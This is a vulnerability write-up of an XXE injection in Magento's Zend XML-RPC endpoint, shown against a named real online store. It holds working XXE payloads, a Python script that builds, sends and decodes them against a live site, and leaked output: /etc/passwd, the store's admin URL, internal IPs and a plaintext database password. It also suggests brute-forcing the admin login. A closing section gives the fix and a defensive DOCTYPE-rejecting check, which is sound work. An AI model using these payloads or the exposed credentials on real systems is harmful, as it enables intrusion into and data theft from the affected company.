The vulnerability is an XML External Entity (XXE) injection in the Zend Framework XML-RPC server (Zend_XmlRpc), which Magento uses for its /api/xmlrpc endpoint: the request parser expands external entities declared in the DOCTYPE, so an attacker can make the server read local files into the response.
Details: references for the vulnerability:
http://www.80sec.com/xml-entity-injection.html
http://sebug.net/vuldb/ssvid-60242
Zend advisory: http://framework.zend.com/security/advisory/ZF2012-01
Walkthrough:
Target URL: shop.adidas.cn
Site background: the adidas online store is built on open-source Magento and was developed by Bysoft.
URL: shop.adidas.cn/api/xmlrpc/index/
shop.adidas.cn/info.php
POST the following body directly to shop.adidas.cn/api/xmlrpc/index to read /etc/passwd:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
The response echoes the expanded entity, i.e. the contents of /etc/passwd:
root:x:0:0:root:/bin/bash
bin:x:1:1:bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin/shutdown
halt:x:7:0:halt:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
# games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
# ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
messages:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin
abrt:x:173:173:/etc/abrt:/sbin/nologin
hsqldb:x:96:96:/var/lib/hsqldb:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
postfix:x:89:89:/var/spool/postfix:/sbin/nologin
qpidd:x:497:494:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38:/etc/ntp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:496:493:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
TPD:x:42:42:/var/lib/TPD:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/bin/bash
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
uuidd:x:495:487:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
tcpdump:x:72:72:/:/sbin/nologin
userweb:x:501:501:/home/userweb:/bin/bash
www:x:502:502:/dev/none:/sbin/nologin
# nomal:x:503:503:/home/nomal:/bin/bash
mailnull:x:47:47:/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51:/var/spool/mqueue:/sbin/nologin
bysoft:x:504:504:/home/bysoft:/bin/bash
Reading other files ran into a second problem: a .php or .xml file is not plain text from the parser's point of view, so when the entity is expanded its own markup is parsed as XML instead of being returned as the method name, or the request fails to parse at all. Following Jianxin's write-up on this, I wrapped the read in PHP's php://filter stream with convert.base64-encode, and with that I successfully read the website's configuration files.
When reading files such as .php and .xml, the entity must therefore base64-encode the file on the server side, and the response is base64-decoded afterwards to restore it:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
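The two payloads above differ only in the entity's SYSTEM identifier, and the real work on the client side is getting the leaked file back out of the XML-RPC response. The following script is an added example (it is not code from the original write-up and was not used against the site): it builds the methodCall with the external entity in <methodName>, optionally wrapped in the php://filter base64 read, and decodes what comes back. It assumes that the server echoes the expanded method name inside the faultString of an XML-RPC fault, which is the channel by which the file content reaches the client; the SAMPLE_FAULT response, the local.xml-shaped fragment and the host and user values in it are constructed for the demo.

```python
# Added example for the XXE payloads above; not code from the original write-up.
# Assumption: the XML-RPC server reports the unknown (expanded) method name in
# the faultString of its fault response. SAMPLE_FAULT below is constructed.
import base64
import re
import urllib.request
import xml.etree.ElementTree as ET

B64_FILTER = "php://filter/read=convert.base64-encode/resource="


def build_xxe_payload(resource: str, base64_wrap: bool = False) -> str:
    """Return the XML-RPC request whose <methodName> expands to `resource`.

    `resource` is whatever PHP's stream layer accepts: "file:///etc/passwd",
    or a path such as "app/etc/local.xml" relative to the script's working
    directory. With base64_wrap the entity reads through php://filter, which
    is needed for .php/.xml targets: their raw "<" and "<?" would otherwise
    be parsed as markup once the entity is expanded.
    """
    system_id = (B64_FILTER + resource) if base64_wrap else resource
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT methodName ANY>\n"
        f'<!ENTITY xxe SYSTEM "{system_id}">]>\n'
        "<methodCall>\n"
        "<methodName>&xxe;</methodName>\n"
        "</methodCall>\n"
    )


# A run of base64 long enough not to be confused with an ordinary word.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_leak(response_xml: str, base64_wrap: bool = False) -> str:
    """Recover the leaked file from an XML-RPC response.

    Every <string> element's text is collected (a fault carries the echoed
    method name in its faultString). For a base64-wrapped read the longest
    base64 run in that text is decoded; otherwise the text is returned as-is.
    """
    root = ET.fromstring(response_xml)
    text = "\n".join(node.text or "" for node in root.iter("string"))
    if not base64_wrap:
        return text
    runs = _B64_RUN.findall(text)
    if not runs:
        raise ValueError("no base64 payload found in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


def send_payload(url: str, payload: str, timeout: float = 10.0) -> str:
    """POST the payload to the XML-RPC endpoint and return the raw response body."""
    req = urllib.request.Request(
        url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "text/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample: a fragment shaped like Magento's local.xml connection
# block (hypothetical host/user values) and the fault an XML-RPC server is
# assumed to return when the expanded method name does not exist.
SAMPLE_LOCAL_XML = (
    "<connection><host><![CDATA[10.0.0.5]]></host>"
    "<username><![CDATA[shop_user]]></username></connection>"
)
SAMPLE_FAULT = (
    '<?xml version="1.0"?><methodResponse><fault><value><struct>'
    "<member><name>faultCode</name><value><int>620</int></value></member>"
    '<member><name>faultString</name><value><string>Method "'
    + base64.b64encode(SAMPLE_LOCAL_XML.encode("utf-8")).decode("ascii")
    + '" does not exist</string></value></member>'
    "</struct></value></fault></methodResponse>"
)


if __name__ == "__main__":
    print(build_xxe_payload("app/etc/local.xml", base64_wrap=True))
    print(extract_leak(SAMPLE_FAULT, base64_wrap=True))
```

To use it against a live endpoint, pass the output of build_xxe_payload to send_payload and feed the body to extract_leak with the same base64_wrap flag; for Magento the database block lives in app/etc/local.xml relative to the docroot, so a relative path works without knowing the absolute install directory.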
Next I read the admin backend URL of the adidas site from the configuration:
https://shop.adidas.cn/index.php/adi_admin_das_online
The database configuration (the connection block of Magento's app/etc/local.xml):
<host><![CDATA[172.16.201.12]]></host>
<username><![CDATA[adidas_web]]></username>
<password><![CDATA[8uhb%TGB]]></password>
<dbname><![CDATA[adidas_11120]]></dbname>
<initStatements><![CDATA[set names utf8]]></initStatements>
<model><![CDATA[mysql4]]></model>
<type><![CDATA[pdo_mysql]]></type>
<pdoType><![CDATA[]]></pdoType>
<active>1</active>
The memcached configuration:
<memcached>
<servers>
<server1>
<host><![CDATA[172.16.200.10]]></host>
<port><![CDATA[12000]]></port>
<persistent><![CDATA[1]]></persistent>
</server1>
<server2>
<host><![CDATA[172.16.200.11]]></host>
<port><![CDATA[12000]]></port>
<persistent><![CDATA[1]]></persistent>
</server2>
</servers>
<compression><![CDATA[0]]></compression>
<cache_dir><![CDATA[]]></cache_dir>
<hashed_directory_level><![CDATA[]]></hashed_directory_level>
<hashed_directory_umask><![CDATA[]]></hashed_directory_umask>
<file_name_prefix><![CDATA[]]></file_name_prefix>
</memcached>
With the admin URL known, the next step is obvious: before Magento 1.7 the admin login form had no CAPTCHA, so an attacker can brute-force the admin username and password directly.
I did not go any further.
Solution:
Upgrade Zend Framework to a release that contains the ZF2012-01 fix (it disables external entity loading with libxml_disable_entity_loader(true) before the XML-RPC request is parsed), or apply the same change to the copy Magento ships in lib/Zend. XML-RPC never needs a DTD, so requests to /api/xmlrpc that carry a DOCTYPE can also be dropped at the web server or WAF as a stopgap. Since the database and memcached settings and the admin path have already been exposed, the credentials should be rotated and the admin URL changed as well.
See also: http://www.bkjia.com/Article/201208/149569.html
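The fix reduces to one rule: an XML-RPC request must never carry a DOCTYPE or declare entities, and that has to be decided before the parser that would expand them ever sees the body. The following gate is an added example, not the Zend Framework's own patch and not Magento code; it is written in Python with the standard-library expat bindings to show the check independently of PHP, and BENIGN_REQUEST is a constructed sample of an ordinary Magento API call. The expat callbacks fire as soon as the declaration is seen, so raising from them stops parsing before any &reference; in the body could be expanded, and external entity loading is never enabled.

```python
# Added example of a pre-parse gate for XML-RPC bodies; not the Zend Framework's
# own fix and not Magento code. Rejects DOCTYPE and entity declarations before
# any entity reference could be expanded. BENIGN_REQUEST is constructed.
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised for bodies that must not reach the XML-RPC parser."""


def check_xmlrpc_body(body: str) -> None:
    """Raise UnsafeXml if `body` declares a DOCTYPE or any entity, or is not XML.

    Returns None for a well-formed body with no prologue declarations.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE", before the internal subset is read, so an
        # external entity declaration is never even registered.
        raise UnsafeXml(f"DOCTYPE {name!r} is not allowed in XML-RPC requests")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        # Defensive second layer: covers internal entities (entity expansion
        # attacks) as well as external ones.
        raise UnsafeXml(f"entity declaration {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXml(f"malformed XML: {exc}") from exc


def is_safe_xmlrpc(body: str) -> bool:
    """True if the body may be handed to the XML-RPC parser, False otherwise."""
    try:
        check_xmlrpc_body(body)
    except UnsafeXml:
        return False
    return True


# Constructed: an ordinary Magento API call with no DTD at all.
BENIGN_REQUEST = (
    '<?xml version="1.0"?>'
    "<methodCall><methodName>catalog_product.info</methodName>"
    "<params><param><value><string>123</string></value></param></params>"
    "</methodCall>"
)

# The external-entity payload from the write-up, as one line.
XXE_REQUEST = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ELEMENT methodName ANY>'
    '<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<methodCall><methodName>&xxe;</methodName></methodCall>"
)


if __name__ == "__main__":
    print("benign:", is_safe_xmlrpc(BENIGN_REQUEST))  # True
    print("xxe:   ", is_safe_xmlrpc(XXE_REQUEST))     # False
```

Run this check on the raw request body in front of the XML-RPC dispatcher and return an XML-RPC fault for anything it rejects; it deliberately refuses a bare `<!DOCTYPE methodCall>` without an internal subset too, since a legitimate client has no reason to send one.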